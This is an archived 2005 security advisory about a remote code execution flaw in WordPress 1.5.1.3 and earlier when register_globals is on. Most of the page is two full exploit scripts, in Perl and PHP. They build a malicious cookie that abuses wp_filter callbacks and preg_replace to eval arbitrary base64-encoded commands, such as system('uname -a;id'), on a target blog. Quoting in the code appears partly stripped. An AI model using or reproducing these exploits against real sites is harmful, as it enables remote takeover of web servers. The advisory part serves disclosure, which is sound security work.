Ads WordPress Command Execution Vulnerability (Cache_lastpostdate) Thursday, 11 August 2005 Summary A vulnerability in WordPresss handling of incoming cookie information allows remote attackers to cause the program to execute arbitrary code if the PHP settings of register_globals has been set to On. Credit: The information has been provided by Kartoffelguru. Details Vulnerable Systems: * WordPress version 1.5.1.3 and prior (with register_globals) Immune Systems: * WordPress version 1.5.1.4 or newer Perl Exploit: #!/usr/bin/perl use strict; use MIME::Base64 qw(encode_base64 decode_base64); use IO::Socket; print "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit (Converted by Noam) "; print "(C) Copyright 2005 Kartoffelguru "; print "[!] info: requires register_globals turned on on target host "; if (@ARGV < 2) { die ("usage: ./wpx.php http://www.xyz.net/blog/ system("uname -a;id"); "); } my $url = shift; my $cmd = shift; if (length($cmd)==0) { $cmd = phpinfo();; } #print "code: ".encode_base64($cmd, )." "; my @code = unpack("C*", encode_base64($cmd, )); #print "code: @code "; my $cnv = ""; for (my $i=0;$i<@code; $i++) { $cnv.= "chr(".$code[$i].")."; } $cnv.="chr(32)"; #print "cnv: $cnv "; my $str = encode_base64(args[0]=eval(base64_decode(.$cnv.)).die()&args[1]=x, ); #print "str: [$str] "; my $cookie=wp_filter[query_vars][0][0][function]=get_lastpostdate;". "wp_filter[query_vars][0][0][accepted_args]=0;; $cookie.=wp_filter[query_vars][0][1][function]=base64_decode;". "wp_filter[query_vars][0][1][accepted_args]=1;; $cookie.=cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=; $cookie.=$str; $cookie.=;wp_filter[query_vars][1][0][function]=parse_str;". "wp_filter[query_vars][1][0][accepted_args]=1;; $cookie.=wp_filter[query_vars][2][0][function]=get_lastpostmodified;" . "wp_filter[query_vars][2][0][accepted_args]=0;; $cookie.=wp_filter[query_vars][3][0][function]=preg_replace;" . "wp_filter[query_vars][3][0][accepted_args]=3;; $url =~ /http://([^/]+)/(.*?)/; my $hostname = $1; my $path = $2; my $Request = "GET /$path HTTP/1.1 Host: $hostname Cookie: $cookie Referer: $hostname Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) "; my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $hostname, PeerPort => 80); unless ($socket) { die "cannot connect to http daemon on $hostname" } print "Request: [$Request] "; print $socket $Request; while (<$socket>) { print $_; } PHP Exploit: echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit "; echo "(C) Copyright 2005 Kartoffelguru "; echo "[!] info: requires register_globals turned on on target host "; if (!extension_loaded(curl)) { die ("[-] you need the curl extension activated... "); } function usage() { die ("usage: ./wpx.php -h http://www.xyz.net/blog/ -c system("uname -a;id"); "); } $options = getopt("h:c:"); if (count($options) < 1 || !isset($options[h])) { usage(); } $host = (is_array($options[h]) ? $options[h][0]:$options[h]); $cmd = (is_array($options[c]) ? $options[c][0]:$options[c]); if (!preg_match("/^http:///", $host, $dummy)) { usage(); } if (strlen(trim($cmd))==0) { $cmd = phpinfo();; } $code = base64_encode($cmd); echo "code: $code "; $cnv = ""; for ($i=0;$i $cnv.= "chr(".ord($code[$i]).")."; } $cnv.="chr(32)"; echo "cnv: $cnv "; $str = base64_encode(args[0]=eval(base64_decode(.$cnv.)).die()&args[1]=x); $cookie=wp_filter[query_vars][0][0][function]=get_lastpostdate; . wp_filter[query_vars][0][0][accepted_args]=0;; $cookie.=wp_filter[query_vars][0][1][function]=base64_decode; . wp_filter[query_vars][0][1][accepted_args]=1;; $cookie.=cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=; $cookie.=$str; $cookie.=;wp_filter[query_vars][1][0][function]=parse_str; . wp_filter[query_vars][1][0][accepted_args]=1;; $cookie.=wp_filter[query_vars][2][0][function]=get_lastpostmodified; . wp_filter[query_vars][2][0][accepted_args]=0;; $cookie.=wp_filter[query_vars][3][0][function]=preg_replace; . wp_filter[query_vars][3][0][accepted_args]=3;; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 0); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"); curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0); echo "[+] now executing "; $r = curl_exec($ch); curl_close($ch); echo $r; ?>   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.